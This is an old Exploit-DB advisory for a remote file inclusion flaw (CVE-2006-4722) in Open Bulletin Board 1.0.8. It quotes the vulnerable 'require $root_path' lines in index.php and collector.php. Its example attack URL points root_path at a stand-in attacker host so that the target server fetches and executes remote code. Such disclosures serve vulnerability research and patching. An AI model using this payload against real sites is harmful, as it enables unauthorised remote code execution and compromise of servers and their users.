Open Bulletin Board <= 1.0.8 - root_path File Include Vulnerability

2006-09-10T00:00:00
ID EDB-ID:2341
Type exploitdb
Reporter Eddy_BAck0o
Modified 2006-09-10T00:00:00

Description

Open Bulletin Board <= 1.0.8 (root_path) File Include Vulnerability. CVE-2006-4722. Webapps exploit for php platform

                                        
                                            +--------------------------------------------------------------------
+
+  Open Bulletin Board 1.0.8 ; Multiple Remote File Include Vulnerabilities
+
+-------------------------------------------------------------------
+
+ Affected Software .: Software
+ Version .............:  Open Bulletin Board 1.0.8
+ Venedor ...........:   http://www.openbb.com
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Discovered by ..........: Eddy_BAck0o
+ Contact ...........: l0x3[at]hotmail.com
+
+--------------------------------------------------------------------
+--------------------------------------------------------------------
+ ./index Directory ...
~ [index.php]
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ require $root_path . "base.php"; &lt;--- 30 - 380
+ require $root_path . "base.php"; &lt;--- 46 - 380
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+ Ex --&gt;
http://www.victom.com/index.php?root_path=http://yourevil.com/r0x.txt?cmd
+
+-------------------------------------------------------------------
+
~ [collector.php]
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ root_path = "./"; &lt;--- 24 - 194
+ require $root_path . "base.php"; &lt;--- 159 - 194
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+ Ex --&gt;
http://www.victom.com/index.php?root_path=http://yourevil.com/r0x.txt?cmd
+
+-------------------------------------------------------------------
+ Greetz LEzr.com/vB Member's ; My Team ; My Best [ MoHaJaLi ] ;....
+--------------------------------------------------------------------
+--------------------------------------------------------------------

# milw0rm.com [2006-09-10]